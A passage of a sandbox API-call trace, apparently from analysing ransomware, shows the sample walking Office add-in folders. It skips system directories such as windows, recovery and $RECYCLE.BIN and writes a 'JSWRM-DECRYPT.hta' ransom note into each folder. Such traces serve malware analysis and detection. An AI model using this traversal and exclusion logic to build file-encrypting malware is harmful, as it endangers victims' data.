lpDistanceToMoveHigh=0x0) returned 0x0 [0123.397] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.398] CloseHandle (hObject=0x338) returned 1 [0123.398] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sr-Latn\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sr-latn\\jswrm-decrypt.hta")) returned 0x20 [0123.398] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sr-Latn\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6aee686, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d05722, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4036427e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x232140 [0123.398] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.398] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6aee686, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d05722, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4036427e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.398] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.398] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.398] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4036427e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4036427e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4036427e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.398] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.399] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.399] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6d05722, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6d05722, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d05722, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.399] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.399] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.399] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.399] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.399] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.399] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.399] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.399] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.399] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.399] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.399] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb94fd84, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb94fd84, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb99c21f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x26040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.399] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.399] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.400] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b14875, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6b14875, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6b3aadd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x31aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.400] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.400] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x624ad43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x624ad43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x86aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.400] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.401] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.401] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.401] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.401] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.401] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.401] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.401] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.401] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.401] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.401] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x624ad43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x624ad43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x86aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0123.401] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0123.401] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0123.401] lstrcmpiW (lpString1="sr-Latn-CS", lpString2=".") returned 1 [0123.401] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="..") returned 1 [0123.401] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="...") returned 1 [0123.401] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="windows") returned -1 [0123.401] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="recovery") returned 1 [0123.401] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="perflogs") returned 1 [0123.401] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="documents and settings") returned 1 [0123.401] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="$RECYCLE.BIN") returned 1 [0123.401] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="system volume information") returned -1 [0123.401] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="msocache") returned 1 [0123.401] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sr-Latn-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sr-latn-cs\\jswrm-decrypt.hta")) returned 0xffffffff [0123.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sr-Latn-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sr-latn-cs\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.405] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.405] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.406] CloseHandle (hObject=0x338) returned 1 [0123.407] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sr-Latn-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sr-latn-cs\\jswrm-decrypt.hta")) returned 0x20 [0123.407] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sr-Latn-CS\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4036427e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0123.407] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.407] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4036427e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.407] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.407] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.407] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4036427e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4036427e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4038a745, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.407] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.407] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.407] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.407] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.407] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.407] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.407] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.407] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.407] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.407] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.407] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfae953d0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfae953d0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfaebb622, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.407] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.407] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.407] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 